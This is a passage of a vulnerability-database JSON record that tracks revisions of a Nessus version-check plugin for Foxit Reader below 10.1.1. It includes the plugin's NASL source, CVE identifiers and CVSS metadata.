script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13547\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-12-24T02:32:35", "differentElements": ["cvss", "sourceData"], "edition": 1}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "9862b143e29b81652f42e2b02e58b29b0dcb17e3a825d9d9ee126047320ebfe4", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-25T02:47:01", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2020-12-25T02:47:01", "references": [{"idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-25T02:47:01", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/24\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13548\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-12-25T02:47:01", "differentElements": ["cvss", "cvss3", "reporter", "sourceData"], "edition": 2}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "51f9c40ed12e151ffdbccbaed52dae5df4411f3b92d40270a05e817d773bf0b3", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-02-18T10:51:54", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-02-18T10:51:54", "references": [{"idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-18T10:51:54", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/17\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-02-18T10:51:54", "differentElements": ["cvss3", "sourceData"], "edition": 3}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "612013062ef059e9290be33df36dbc81c2bb4d2450b7f73dcd1426d34f01b5e0", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-02-20T10:49:47", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-02-20T10:49:47", "references": [{"idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-20T10:49:47", "rev": 2, "value": 7.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-02-20T10:49:47", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "d9e162d944cd26f84adc93b2ac3fd21b7fe6634c22f79f17e4735000caad2ccc", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-06-03T23:58:24", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2021-06-03T23:58:24", "references": [{"idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-06-03T23:58:24", "rev": 2, "value": 7.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-06-03T23:58:24", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "80675a4b7e74688d7df634bae13a9bf2", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-07-29T00:04:27", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "cve", "idList": ["CVE-2020-13547", "CVE-2020-13570", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13557", "CVE-2020-13548"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1171", "TALOS-2020-1175", "TALOS-2020-1165"]}], "modified": "2021-07-29T00:04:27", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-07-29T00:04:27", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T00:04:27", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "87ba01af25b21f455cd9950de9565f00", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": 